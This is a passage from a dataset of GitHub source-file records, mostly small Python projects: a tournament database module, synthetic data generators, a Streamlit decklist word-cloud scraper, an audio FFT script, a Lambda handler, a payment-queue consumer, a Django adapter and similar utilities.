c.commit()\n c.close()\n\n\ndef deletePlayers():\n \"\"\"Delete players from the database.\"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('DELETE FROM players')\n\n c.commit()\n c.close()\n\n\ndef countPlayers():\n \"\"\"Returns number of players in the database.\"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('SELECT COUNT(*) FROM players')\n\n count = cursor.fetchone()[0]\n\n c.commit()\n c.close()\n\n return count\n\n\ndef registerPlayer(name):\n \"\"\"Delete players from the database.\"\"\"\n\n # Cleaning the passed name just in case.\n clean_name = bleach.clean(name, strip=True)\n\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\n \"INSERT INTO players (player_name) VALUES (%s)\", (clean_name,))\n\n c.commit()\n c.close()\n\n\ndef playerStandings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\"SELECT * FROM results\")\n\n results = cursor.fetchall()\n return_val = []\n for result in results:\n # int() is required because an L is appended to each integer in the\n # results that are returned unless the number is converted.\n return_val.append(\n [result[0], result[1], int(result[2]), int(result[3])])\n\n c.close()\n\n return return_val\n\n\ndef reportMatch(winner, loser):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won\n loser: the id number of the player who lost\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\n \"INSERT INTO matches (winner_id, loser_id) VALUES (%s, %s)\", (winner, loser,))\n\n c.commit()\n c.close()\n\n\ndef swissPairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n # Grab the rankings through the playerStandings function.\n ranking = playerStandings()\n\n c.close()\n\n pairs = []\n\n # Because the results view already sorts players by how many wins they have,\n # all we need to do here is drill down the list.\n while len(ranking) > 1:\n player_a = ranking.pop(0)\n player_b = ranking.pop(0)\n pairs.append((player_a[0], player_a[1], player_b[0], player_b[1]))\n\n return pairs\n","repo_name":"dwellsdev/fullstack-nanodegree-tournament","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"877928326","text":"from sklearn.datasets import make_blobs\nimport numpy as np\nimport random\n\n\ndef make_shirts(count=500):\n def did_shirt_sell(hasPhoto, hasModel, price, reviewCount, reviewAverageLength, isAdvertised, isListedForSale):\n p = 0.2\n if hasModel:\n p = np.mean([p, 0.4])\n elif hasPhoto:\n p = np.mean([p, 0.3])\n if isAdvertised:\n p = np.mean([p, 0.6])\n if isListedForSale:\n p = np.mean([p, 0.5])\n if reviewCount < 5:\n p = np.mean([p, 0.1])\n price = min(30, price)\n price = max(5, price)\n p = np.mean([p, -0.04 * price + 1])\n p = np.mean([p, 0.6 / (1 + np.exp(-3 + 2))])\n return np.random.binomial(1, p)\n data = np.array([(\n random.choice([1, 0]),\n random.choice([1, 0]),\n random.gauss(15, 5),\n random.randint(0, 100),\n random.randint(10, 5000),\n random.choice([1, 0]),\n random.choice([1, 0]),\n ) for x in xrange(count)])\n target = np.array([did_shirt_sell(*x) for x in data])\n return type('Dataset', (object,), dict(\n data=data,\n target=target,\n feature_names=[\n 'hasPhoto',\n 'hasModel',\n 'price',\n 'reviewCount',\n 'reviewAverageLength',\n 'isAdvertised',\n 'isListedForSale',\n ]))\n\n\ndef make_users(teenCount=250, twentyCount=500, thirtyCount=150, fortyCount=100):\n def make_user(meanAge, commonDevice):\n age = random.gauss(meanAge, 3)\n gender = random.choice(xrange(2))\n if np.random.binomial(1, 0.8):\n device = commonDevice\n else:\n otherDevices = list(set(xrange(5)) - set([commonDevice]))\n device = random.choice(otherDevices)\n return age, gender, device\n data = []\n target = []\n for x in xrange(teenCount):\n data.append(make_user(meanAge=15, commonDevice=4))\n for x in xrange(twentyCount):\n data.append(make_user(meanAge=25, commonDevice=3))\n for x in xrange(thirtyCount):\n data.append(make_user(meanAge=35, commonDevice=1))\n for x in xrange(fortyCount):\n data.append(make_user(meanAge=45, commonDevice=0))\n userCount = teenCount + twentyCount + thirtyCount + fortyCount\n locations = make_blobs(n_samples=userCount, n_features=2, centers=3)[0]\n data = np.c_[\n np.array(data),\n np.array(locations)]\n return type('Dataset', (object,), dict(\n data=data,\n feature_names=[\n 'age',\n 'gender',\n 'device',\n 'x',\n 'y',\n ]))\n\n\ndef make_logs(inlierCount=1000, outlierCount=0):\n # Make normal data\n locations = make_blobs(n_samples=inlierCount, n_features=2, centers=3)[0]\n weekdays = [random.choice([1, 2, 3, 4, 5]) for x in xrange(inlierCount)]\n times = np.random.uniform(low=8, high=20, size=inlierCount)\n urlCounts = np.random.uniform(low=1, high=5, size=inlierCount)\n averageURLAccessCounts = np.random.uniform(low=1, high=10, size=inlierCount)\n X1 = np.c_[\n np.array(locations),\n np.array(weekdays),\n np.array(times),\n np.array(urlCounts),\n np.array(averageURLAccessCounts)]\n if not outlierCount:\n return type('Dataset', (object,), dict(data=X1))\n # Make abnormal data\n locations = make_blobs(n_samples=outlierCount, n_features=2, centers=3)[0]\n weekdays = [random.choice(xrange(7)) for x in xrange(outlierCount)]\n times = np.random.uniform(low=0, high=23, size=outlierCount)\n urlCounts = np.random.uniform(low=1, high=1000, size=outlierCount)\n averageURLAccessCounts = np.random.uniform(low=1, high=1000, size=outlierCount)\n X2 = np.c_[\n np.array(locations),\n np.array(weekdays),\n np.array(times),\n np.array(urlCounts),\n np.array(averageURLAccessCounts)]\n return type('Dataset', (object,), dict(data=np.r_[X1, X2]))\n","repo_name":"crosscompute/analytical-tutorials","sub_path":"20120607-computational-analysis/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"48"} +{"seq_id":"39557481367","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom wordcloud import WordCloud\nfrom collections import Counter\n\n\n# http://amueller.github.io/word_cloud/auto_examples/colored_by_group.html\nclass SimpleGroupedColorFunc(object):\n \"\"\"Create a color function object which assigns EXACT colors\n to certain words based on the color to words mapping\n\n Parameters\n ----------\n color_to_words : dict(str -> list(str))\n A dictionary that maps a color to the list of words.\n\n default_color : str\n Color that will be assigned to a word that's not a member\n of any value from color_to_words.\n \"\"\"\n\n def __init__(self, color_to_words, default_color):\n self.word_to_color = {word: color\n for (color, words) in color_to_words.items()\n for word in words}\n\n self.default_color = default_color\n\n def __call__(self, word, **kwargs):\n return self.word_to_color.get(word, self.default_color)\n\n\ndef main():\n decklists_url = \"https://magic.wizards.com/en/content/deck-lists-magic-online-products-game-info\"\n st.header('MTGO Decklists - Wordcloud Generator')\n st.write(\"Insert the URL containing the decklists.\")\n st.write(f\"You can find them here: {decklists_url}\")\n\n # Working example to start the app.\n decklists_data = requests.get(decklists_url)\n decklists_soup = BeautifulSoup(decklists_data.content, 'html.parser')\n\n base_url = 'https://magic.wizards.com'\n modern_url = decklists_soup.select_one(\"a[href*=modern-challenge]\")\n if not modern_url:\n modern_url = decklists_soup.select_one(\"a[href*=modern-preliminary]\")\n\n default_url = urljoin(base_url, modern_url.get('href'))\n # default_url = 'https://magic.wizards.com/en/articles/archive/mtgo-standings/modern-challenge-2020-08-16'\n # Input box\n url = st.text_input('URL: ', default_url)\n # Preventing some malicious use.\n valid_url = url.startswith('https://magic.wizards.com/')\n \n if not valid_url:\n st.write('Insert a valid URL from the official mtgo-standings.')\n if valid_url:\n try:\n fig = build_wordcloud(url)\n # Without these options the figure has an annoying white border.\n st.pyplot(fig, transparent=True, bbox_inches='tight', pad_inches=0)\n except ValueError:\n st.write('The URL does not contain decklists or they changed the layout.')\n\n\ndef build_wordcloud(url):\n \"\"\"\n Scrape MTGO decklists from the official MTGO Archives\n and generate a matplotlib plot with a wordcloud.\n\n Parameters\n ----------\n url : str\n A valid URL from the Wizards of the Coast website\n containing decklists.\n \"\"\"\n\n site_data = requests.get(url)\n soup = BeautifulSoup(site_data.content, 'html.parser')\n\n containers = soup.find_all('div', attrs={'class': 'sorted-by-overview-container'})\n\n # Each decklist is contained in one of those divs.\n decklists = [container.find_all('span', attrs={'class': 'row'}) for container in containers]\n\n card_list = list()\n for decklist in decklists:\n for card in decklist:\n card_name = card.find('span', attrs={'class': 'card-name'}).get_text()\n copies = int(card.find('span', attrs={'class': 'card-count'}).get_text())\n card_list.extend(copies * [card_name])\n\n # Create a frequency dict from the list.\n card_counter = Counter(card_list)\n\n # Pick which cards are which colors.\n colors = ['white', 'blue', 'black', 'red', 'green', 'multi', 'colorless']\n color_to_words = dict()\n for color in colors:\n cards = list()\n for decklist in soup.find_all('div', attrs={'class': f'sorted-by-{color}'}):\n for card in decklist.find_all('span', attrs={'class': 'card-name'}):\n cards.append(card.get_text())\n color_to_words[color] = cards\n\n # Assign a specific RGB color for each of the MTG colors.\n # I took these from the original mana symbols.\n color_to_words['#fcfcc1'] = color_to_words.pop('white')\n color_to_words['#67c1f5'] = color_to_words.pop('blue')\n color_to_words['#846484'] = color_to_words.pop('black')\n color_to_words['#f85555'] = color_to_words.pop('red')\n color_to_words['#26b569'] = color_to_words.pop('green')\n color_to_words['#cfaa4a'] = color_to_words.pop('multi')\n color_to_words['#6b5441'] = color_to_words.pop('colorless')\n\n # Create a set containing the lands to filter them out.\n lands_list = set()\n for decklist in soup.find_all('div', attrs={'class': 'sorted-by-land'}):\n for card in decklist.find_all('span', attrs={'class': 'card-name'}):\n lands_list.add(card.get_text())\n\n for card in lands_list:\n del card_counter[card]\n\n\n cloud = WordCloud(\n background_color='black',\n width=400,\n height=250,\n scale=5,\n ).generate_from_frequencies(card_counter)\n\n # Apply the chosen colors to the wordcloud.\n grouped_color_func = SimpleGroupedColorFunc(color_to_words, default_color='black')\n cloud.recolor(color_func=grouped_color_func)\n\n # Plot the cloud to matplotlib.\n # Normally, you'd call plt.show() to show the plot.\n fig = plt.figure(figsize = (16,9))\n plt.imshow(cloud)\n plt.axis(\"off\")\n return fig\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"tkleyton/mtgo_wordcloud_generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21208453514","text":"import pyaudio\nimport os\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft\nimport time\n\n\n# constants\nCHUNK = 1024 # samples per frame\nFORMAT = pyaudio.paInt16 # audio format (bytes per sample?)\nCHANNELS = 1 # single channel for microphone\nRATE = 44100 # samples per second\n\nfreqRange = np.array([500,2000])\nfreqBlock = freqRange*(2*CHUNK)/(RATE)\n\n\n#for discrete counting\nglobvar = 0\ncount = 0\n\ndef incORnot():\n global globvar\n if ((globvar) == 0):\n (globvar) = 1\n return 1\n return 0\n\n# pyaudio class instance\np = pyaudio.PyAudio()\n\n# stream object to get data from microphone\nstream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n)\n\n\nxf = np.linspace(0, RATE, CHUNK) # frequencies (spectrum)\n\n\nprint('stream started')\n\n\nwhile True:\n # binary data\n data = stream.read(CHUNK) \n \n # convert data to integers, make np array, then offset it by 127\n data_int = struct.unpack(str(2 * CHUNK) + 'B', data)\n \n avgData = np.sum(data_int)/(len(data_int))\n avgPower = 20*np.log10(avgData/255)\n\n print(avgPower)\n # compute FFT and update line\n yf = fft(data_int)\n yf_data = (np.abs(yf[int(freqBlock[0]):int(freqBlock[1])]) / (128 * CHUNK))\n \n power = 20*np.log10(yf_data)\n\n\n\n# print(np.max(power))\n \n# if((np.max(power)) > -12):\n# if (incORnot() == 1):\n# count = count + 1\n# print(\"HI\")\n# elif ((np.max(power)) < -30):\n# globvar = 0\n \n# if(np.max(power) > -15):\n# print(np.max(power), count)\n\n\n","repo_name":"AwaleSajil/test","sub_path":"part3.py","file_name":"part3.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6729824332","text":"# import requests\nimport logging\nimport json\nimport os\nfrom urllib.parse import parse_qs\nfrom lastlink.link import Link\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nif os.environ.get('Environment', 'Test') == 'Prod':\n logger.setLevel(logging.INFO)\n\n\ndef params_from_headers(headers, body, queryString):\n # Handles content both as JSON and WWW form - also queryString\n logger.debug(headers)\n logger.debug(body)\n cf = \"Content-Type\"\n parameters = {}\n if cf not in headers:\n cf = cf.lower()\n if cf not in headers and queryString is None:\n logger.error(\"Invalid Event: Payload has no Content-Type header\")\n raise Exception(\"Content-Type not found\")\n else:\n if headers[cf].startswith(\"application/x-www-form-urlencoded\"):\n parameters = parse_qs(body)\n parameters = dict([(x, y[0]) for x, y in parameters.items()])\n elif headers[cf].startswith(\"application/json\"):\n parameters = json.loads(body)\n else:\n logger.error(\"Content is of type {} and not supported\".format(headers[cf]))\n raise Exception(\"Unsupported Content Type\")\n parameters.update(queryString)\n return parameters\n\n\ndef lambda_handler(event, context):\n if \"httpMethod\" not in event or \"headers\" not in event:\n logger.error(\"Invalid Event Triggered: No HTTP Method and/or headers Found!\")\n raise Exception(\"Invalid Resource\")\n try:\n parameters = params_from_headers(event[\"headers\"],\n event.get(\"body\", None),\n event.get('queryStringParameters', {}))\n except Exception as e:\n raise Exception(e)\n linkId = parameters.get('linkid', 'TEST')\n link = Link(linkId)\n if event['httpMethod'] == 'POST':\n if 'newlink' not in parameters:\n raise Exception(\"NewLink not set\")\n newlink = parameters['newlink']\n link.set_latest_link(newlink)\n elif link.latest_link is None:\n raise Exception(\"Link ID %s Not Found\")\n return {\"statusCode\": 200,\n \"headers\": {\"Content-Type\": \"text/plain\"},\n \"body\": link[\"Node\"]}\n","repo_name":"trafficone/LastLink","sub_path":"src/lastlink/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3748497410","text":"from typing import List\n\n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n def dfs(coins, remain, memo):\n if remain in memo:\n return memo[remain]\n if remain == 0:\n # handle base save state\n return 0\n if remain < 0:\n # handle base discard\n return -1\n\n minCount = float('inf')\n for coin in coins:\n count = dfs(coins, remain - coin, memo)\n if count == -1: continue\n minCount = min(minCount, count + 1)\n\n memo[remain] = minCount\n return minCount if minCount != float('inf') else -1\n\n return dfs(coins, amount, {})\n\nif __name__ == '__main__':\n coins = [2, 3, 5]\n s = Solution()\n print(s.coinChange(coins, 8))","repo_name":"jprice8/interview-prep","sub_path":"dynamic-programming/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70897355026","text":"import pika\nfrom retry import retry\nfrom card_validator import Validator\nimport json\nfrom models.card_model import CardModel\nfrom models.payment_model import PaymentModel\nfrom notifier import PaymentNotifier\nfrom payment_repository import PaymentRepository\nfrom container import Container\nfrom Settings import Settings\n\n\n@retry(pika.exceptions.AMQPConnectionError, delay=5, jitter=(1, 3))\ndef get_connection():\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='rabbit1', port=5672)\n )\n\n channel = connection.channel()\n channel.queue_declare('order')\n channel.queue_declare('payment')\n return channel\n\n\ndef callback(ch, method, properties, body):\n body = body.decode(\"utf-8\")\n\n body = json.loads(body)\n card = CardModel(**body[\"creditCard\"])\n\n print('validating')\n valid = validator.validate(card)\n payment = PaymentModel(orderId=body[\"orderId\"], success=valid)\n repo.create_payment(payment)\n notifier.notify(json.dumps(body), valid)\n\n\ndef arrange():\n container = Container()\n container.config.from_pydantic(Settings(_env_file='.env'))\n return container\n\n\nif __name__ == '__main__':\n container = arrange()\n repo: PaymentRepository = container.payment_repository_provider()\n validator = Validator()\n notifier = PaymentNotifier()\n connection = get_connection()\n connection.basic_consume(queue='order',\n on_message_callback=callback,\n auto_ack=True)\n connection.start_consuming()\n","repo_name":"creep1g/T-302-HONN-project2","sub_path":"PaymentService/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23497336776","text":"import contextlib\nimport json\nfrom os import environ\nfrom typing import Any, Dict, List\n\nimport django\nfrom django.contrib import admin\nfrom django.core.management import call_command\nfrom django.http import HttpRequest as DjangoRequest\nfrom django.http import JsonResponse\nfrom django.urls import path\nfrom django.views.decorators.http import require_http_methods\n\nfrom py_clean_arch.application.protocols.controller_protocol import Controller\nfrom py_clean_arch.infra.http.helpers.http_request import HttpRequest\n\n\nclass Borg(object):\n _state: Dict[Any, Any] = {}\n\n def __new__(\n cls,\n *args,\n shared_state: bool = True,\n **kwargs,\n ):\n instance = super(Borg, cls).__new__(cls)\n if shared_state:\n instance.__dict__ = Borg._state\n return instance\n\n\ndef get_query_params_as_dict(request: DjangoRequest) -> Dict[Any, Any]:\n query_params: Dict[Any, Any] = {}\n for key, value in request.GET.items():\n values_as_list = request.GET.getlist(key)\n if len(values_as_list) > 1:\n query_params[key] = values_as_list\n continue\n query_params[key] = value\n return query_params\n\n\nclass DjangoHttpServer(Borg):\n def __init__(self) -> None:\n environ.setdefault(\n \"DJANGO_SETTINGS_MODULE\",\n \"py_clean_arch.infra.http.django_http_server.django_http_server.settings\",\n )\n django.setup()\n self.urlpatterns: List[Any] = getattr(\n self,\n \"urlpatterns\",\n [\n path(\"admin/\", admin.site.urls),\n ],\n )\n\n def serve(self, port: int = 8000) -> None:\n call_command(\"runserver\", f\"127.0.0.1:{port}\")\n\n def on(self, method: str, url: str, controller: Controller) -> None:\n url = url[1:] + \"/\"\n\n @require_http_methods([method.upper()])\n def view(request: DjangoRequest, *args, **kwargs) -> Any:\n applicaton_request = HttpRequest(\n body=self.__get_body_as_dict(request),\n params=get_query_params_as_dict(request),\n headers=request.headers,\n )\n output = controller.handle(request=applicaton_request)\n return JsonResponse(\n output.body, status=output.status_code, headers=output.headers\n )\n\n self.urlpatterns.append(path(url, view, name=f\"{method.upper()}-{url}\"))\n\n def __get_body_as_dict(self, request: DjangoRequest) -> Dict[Any, Any]:\n with contextlib.suppress(json.decoder.JSONDecodeError):\n return json.loads(request.body)\n return {}\n\n def __iter__(self) -> Any:\n return iter(self.urlpatterns)\n","repo_name":"erickod/py_clean_arch","sub_path":"py_clean_arch/infra/http/django_http_server/django_http_server_adapter.py","file_name":"django_http_server_adapter.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4544718584","text":"import sys, os\nimport pandas as pd\nimport numpy as np\n\ndef printBasicInfo(df1):\n\tprint (df1.shape)\n\tprint (df1.columns)\n\tprint (df1.index)\n\tprint (df1.dtypes)\n\n# to find profile that are very very similar pairs, used in matching the same sample across dataset,\n# although very close, the profile across different dataset are not identical due to processing difference\ndef find_very_close_pair(corr): \n\tN = corr.shape[0]\n\tfor col in corr.columns:\n\t\tr = corr[col].sort_values()\n\t\tprint (col, r.index[N-2], r[N-2]) # N-1 is the corr =1\n\ndef compute_N_by_N_pearson_correlation(gMatrixfile1, Na_value = 0):\n\tdf1 = pd.read_csv(gMatrixfile1, sep = '\\t', index_col = 0)\n\n\tdf1.replace(Na_value, np.nan, inplace= True)\n\n\tcorr = df1.corr(method = 'pearson')\n\n\treturn corr\n\n\n\nif len(sys.argv[:]) != 4:\n\tprint (\"python pearson_correlation_full.py gMatrix zero_value stats_outoput\\n\")\n\tprint (\"All zero_value will be treated as NA, not used to compute correlation.\\n\")\n\tsys.exit(1)\n\ngMatrixfile1 = sys.argv[1]\nNa_value = float(sys.argv[2]) # NA value\noutput = sys.argv[3]\n\ncorr = compute_N_by_N_pearson_correlation(gMatrixfile1, Na_value)\ncorr.to_csv(output, sep ='\\t')\nfind_very_close_pair(corr)","repo_name":"ucscXena/wrangle","sub_path":"Analysis/pearson_correlation_full.py","file_name":"pearson_correlation_full.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"360130374","text":"# Задайте список из нескольких чисел. Напишите программу, которая найдёт сумму элементов списка, стоящих на нечётной позиции.\n\n# Пример:\n# - [2, 3, 5, 9, 3] -> на нечётных позициях элементы 3 и 9, ответ: 12\n\nfrom random import randint\n\ndef GetNumber(message):\n isCorrect = False\n while isCorrect == False:\n try:\n number = int(input(message))\n isCorrect = True\n except ValueError:\n print(\"Введено не число. Повторите ввод \")\n return number\n\ndef InitList(number):\n my_list = []\n for i in range(number):\n my_list.append(randint(0,10))\n return my_list\n\ndef SumNotEven(my_list):\n sum = 0\n for i in range(1,len(my_list),2):\n sum+=my_list[i]\n return sum\n\nnumb = GetNumber(\"Введите количество элементов списка \")\nnew_list = InitList(numb)\nsum = SumNotEven(new_list)\nprint(f'В списке {new_list} сумма нечетных элементов составляет {sum}')\n","repo_name":"artem-maklashev/Python-HomeWork3","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15265137843","text":"import sys\nimport gzip\nmat=sys.argv[1]\nchr=sys.argv[2]\nfai=sys.argv[3]\nres=int(sys.argv[4])\noup1=sys.argv[5]\noup2=sys.argv[6]\n\nCID={}\nFAI=open(fai,\"r\")\nfor line in FAI:\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tCID[lis[0]]=int(lis[1])\nFAI.close()\n\nNR=CID[chr]/res+1\n#print(NR)\n\nif mat.endswith(\".gz\"):\n\tMAT=gzip.open(mat,\"r\")\nelse:\n\tMAT=open(mat,'r')\nNF=0\n\nsdis={}\nndis={}\nfor line in MAT:\n\tNF+=1\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tnum=len(lis)\n\t#print(num)\n\tif(num!=NR):\n\t\texit(\"Matrix is not in correct format!\")\n\tfor i in range(num):\n\t\tif i+1>=NF:\n\t\t\tdis=i+1-NF\n\t\t\tndis.setdefault(dis,0.0)\n\t\t\tsdis.setdefault(dis,0.0)\n\t\t\tif(lis[i]!=\"NaN\"):\n\t\t\t\tndis[dis]+=1\n\t\t\t\tsdis[dis]+=float(lis[i])\n\t\telse:\n\t\t\tcontinue\nMAT.close()\n#print(NF)\nif (NF!=NR):\n\texit(\"Matrix is not in correct format!\")\n##############generate_expected_value\nEP={}\nOUP=open(oup1,'w')\nfor key in sorted(sdis.keys()):\n\tEP[key]=sdis[key]/ndis[key]\n\tOUP.writelines(str(key)+'\\t'+str(sdis[key]/ndis[key])+'\\t'+chr+'\\t'+str(key*res)+\"\\n\")\nOUP.close()\n###############generate_oe_matrix\n#OUP=gzip.open(oup2,'wt',compresslevel=1)\nOUP=open(oup2,'w')\nif mat.endswith(\".gz\"):\n MAT=gzip.open(mat,\"r\")\nelse:\n MAT=open(mat,'r')\nNF=0\nfor line in MAT:\n\tNF+=1\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tnum=len(lis)\n\tlout=[]\n\tfor i in xrange(num):\n\t\tdis=abs(i+1-NF)\n\t\t#if sdis[dis]/ndis[dis]==0:\n\t\tif EP[dis]==0:\n\t\t\tlout.append(str(0))\n\t\telse:\n\t\t\t#exp=sdis[dis]/ndis[dis]\n\t\t\tlout.append(str(float(lis[i])/EP[dis]))\n\tOUP.writelines(\"\\t\".join(lout)+\"\\n\")\nOUP.close()\n","repo_name":"JiamanZhang/Lab_Porcine-Adiposes_paper_codes","sub_path":"Lab_OE_matrix/codes/generate.oe.matrix.py","file_name":"generate.oe.matrix.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37655091915","text":"from bs4 import BeautifulSoup as BS\nfrom urllib.request import urlopen\nimport pandas\nimport codecs\n\n\n\nclass Movie():\n title = None\n director = None\n section = None\n duration = None\n synopse = None\n\n def __dict__(self):\n return {\"title\": self.title, \"director\": self.director, \"section\": self.section, \"duration\": self.duration,\n \"synopse\": self.synopse}\n\n\ndef URL2BS(url):\n f = urlopen(url)\n page_raw = f.read()\n f.close()\n\n return BS(page_raw, \"html.parser\")\n\n\ndef isSectionBanned(df, banned):\n filter = df['section'].str.contains(banned) == False\n\n return filter\n\n\nmovielist = []\n\nbanned = \"urts|Brigadoon|Espai|Serial|SGAE|Petit|ort\"\n\nsitges = \"http://www.sitgesfilmfestival.com/cat/programa/pel_licules\"\n\nhtml = URL2BS(sitges)\n\nrows = html.findAll(\"div\", {\"class\": \"right-banner-bottom\"})\n\nfor row in rows:\n\n movie = Movie()\n movie.title = row.h3.a.text\n movie.director = row.h6.text\n movie.section = row.p.text\n\n link = row.h3.a\n link = link.get('href')\n sub_html = URL2BS(link)\n\n try:\n movie.synopse = sub_html.find(\"div\", {\"class\": \"section_sinopsi\"}).p.text\n except:\n None\n try:\n movie.duration = sub_html.find(\"div\", {\"class\": \"section_fitxa_artistica\"}).p.strong.text\n except:\n None\n\n d = movie.__dict__()\n movielist.append(d)\n\ndf = pandas.DataFrame(movielist)\ndf.sort_values(by=[\"title\"], inplace=True)\n\n# print(df['section'].value_counts())\n\nprint(df[isSectionBanned(df, banned)].to_html(columns=[\"title\", \"director\", \"section\", \"synopse\", \"duration\"]))\n\n","repo_name":"Clon01/sitges-scrapper","sub_path":"legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6826798768","text":"import collections\nimport contextlib\nimport heapq\nimport os\nimport threading\nimport time\n\nfrom core.delayedcall import DelayedCall\n\n\nclass Timeloop:\n def __init__(self, *, check_args=True):\n self._check_args = check_args\n fdin, fdout = os.pipe2(os.O_NONBLOCK|os.O_CLOEXEC)\n self._wakeupfd = os.fdopen(fdin, 'rb')\n self._signalfd = os.fdopen(fdout, 'wb')\n self._soon_lock = threading.RLock()\n self._soon = collections.deque()\n self._later = []\n self._timer = time.monotonic\n\n def call_soon(self, cb, *args):\n dc = DelayedCall(self, 0, cb, args, check_args=self._check_args)\n self._soon.append(dc)\n return dc\n\n def call_later(self, delay, cb, *args):\n if not delay:\n return self.call_soon(cb, *args)\n now = self._timer()\n when = now + delay\n dc = DelayedCall(self, when, cb, args, check_args=self._check_args)\n heapq.heappush(self._later, dc)\n return dc\n\n def call_soon_threadsafe(self, cb, *args):\n with self._soon_lock:\n ret = self.call_soon(cb, *args)\n self._signal(b'T')\n return ret\n\n def _signal(self, char):\n sent = 0\n while not sent:\n try:\n sent = self._signalfd.write(char)\n except BlockingIOError:\n pass\n\n def _process_timers(self):\n delay = 3600\n with self._soon_lock:\n soon = self._soon\n self._soon = collections.deque()\n q = self._later\n now = self._timer()\n while q:\n dc = q[0]\n if dc.cancelled:\n heapq.heappop(q)\n elif dc.when <= now:\n soon.append(dc)\n heapq.heappop(q)\n else:\n delay = min(delay, dc.when - now)\n break\n for dc in soon:\n dc()\n if self._soon:\n delay = 0\n return delay\n\n def close(self):\n self._signalfd.close()\n self._wakeupfd.close()\n","repo_name":"learnpython/advanced-01","sub_path":"asvetlov/core/timeloop.py","file_name":"timeloop.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"20387823136","text":"def rgb_to_ycbcr(img):\n out = {\n \"y\": [],\n \"cb\": [],\n \"cr\": [],\n \"y_f\": [],\n \"cb_f\": [],\n \"cr_f\": []\n }\n pixels = list(img.getdata())\n out[\"width\"], out[\"height\"] = img.size\n for px in pixels:\n r = px[0]\n g = px[1]\n b = px[2]\n y = (.299 * r) + (.587 * g) + (.114 * b)\n cb = 128 - (.169 * r) - (.331 * g) + (.500 * b)\n cr = 128 + (.500 * r) - (.419 * g) - (.081 * b)\n out[\"y\"].append(int(y))\n out[\"cb\"].append(int(cb))\n out[\"cr\"].append(int(cr))\n out[\"y_f\"].append(y)\n out[\"cb_f\"].append(cb)\n out[\"cr_f\"].append(cr)\n return out\n\n return out\n\n","repo_name":"tliu/jpeg","sub_path":"scripts/rgb_to_ycbcr.py","file_name":"rgb_to_ycbcr.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5728256573","text":"import numpy as np\nimport sys\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n\n\ndef make_phaseii(lstfile, savedir = ''):\n common = {\n 'PROGRAM':'HET23-2-400',\n 'VIFU':'047',\n 'EXP':'1080',\n 'CRSPLIT':'3',\n 